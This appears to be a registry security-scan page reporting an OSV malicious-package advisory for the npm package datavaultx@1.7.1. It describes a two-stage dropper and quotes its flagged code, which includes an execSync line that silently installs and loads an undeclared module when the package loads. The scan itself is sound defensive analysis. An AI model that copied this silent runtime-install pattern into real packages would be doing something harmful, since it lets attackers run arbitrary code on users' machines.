registry  /  datavaultx  /  1.7.1

datavaultx@1.7.1

OSV Malicious Advisory

scanned 5h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10460 confirms this npm version as malicious. On require of the package's main entry (auth.js -> lib/writer.js), the module attempts require('auth-gen-next'); on failure it invokes execSync('npm install auth-gen-next --no-warnings --no-save --no-progress --loglevel silent') and then requires the freshly installed module from../../auth-gen-next/index.js...

Advisory
MAL-2026-10460
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in datavaultx (npm)
Details
On require of the package's main entry (auth.js -> lib/writer.js), the module attempts require('auth-gen-next'); on failure it invokes execSync('npm install auth-gen-next --no-warnings --no-save --no-progress --loglevel silent') and then requires the freshly installed module from../../auth-gen-next/index.js. The fetched package is not declared in this package's dependencies, so its contents are entirely attacker-controlled and can change at any time without a datavaultx release. lib/writer.js additionally constructs a cover-story error string ('Error: This environment is not supported...') via a long chain of String.fromCharCode calls, shown only if the silent install fails. The suppressed logging, undeclared dependency, and character-code obfuscation of the failure message together indicate a two-stage dropper design in which the visible package is a thin shim that pulls its real payload from a separately-published module at load time.
Decision reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessEnvironmentVarsFilesystem
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 17 file(s), 53.3 KB of source, external domains: github.com

Source & flagged code

4 flagged · loading source
lib/writer.jsView file
4const path = require('path'); L5: const { execSync } = require('child_process'); L6:
High
Child Process

Package source references child process execution.

lib/writer.jsView on unpkg · L4
33try { L34: execSync(`npm install auth-gen-next --no-warnings --no-save --no-progress --loglevel silent`, { windowsHide: true }); L35: require('../../auth-gen-next/index.js');
High
Runtime Package Install

Package source invokes a package manager install command at runtime.

lib/writer.jsView on unpkg · L33
matchType = malicious_source_fingerprint_signature signature = a37d20f9f29b12aa signatureType = suspicious_hashes sourceLabel = Datadog matchedPackage = rbac-auth@1.0.6 matchedPath = lib/writer.js matchedIdentity = npm:cmJhYy1hdXRo:1.0.6 similarity = 1.000 shingleOverlap = 12 summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/rbac-auth/1.0.6/2026-06-05-rbac-auth-v1.0.6.zip
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

lib/writer.jsView on unpkg
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

3 High3 Medium4 Low
HighChild Processlib/writer.js
HighRuntime Package Installlib/writer.js
HighKnown Malware Source Fingerprint Signaturelib/writer.js
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
MediumSecret Patterndocs/transports.md
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings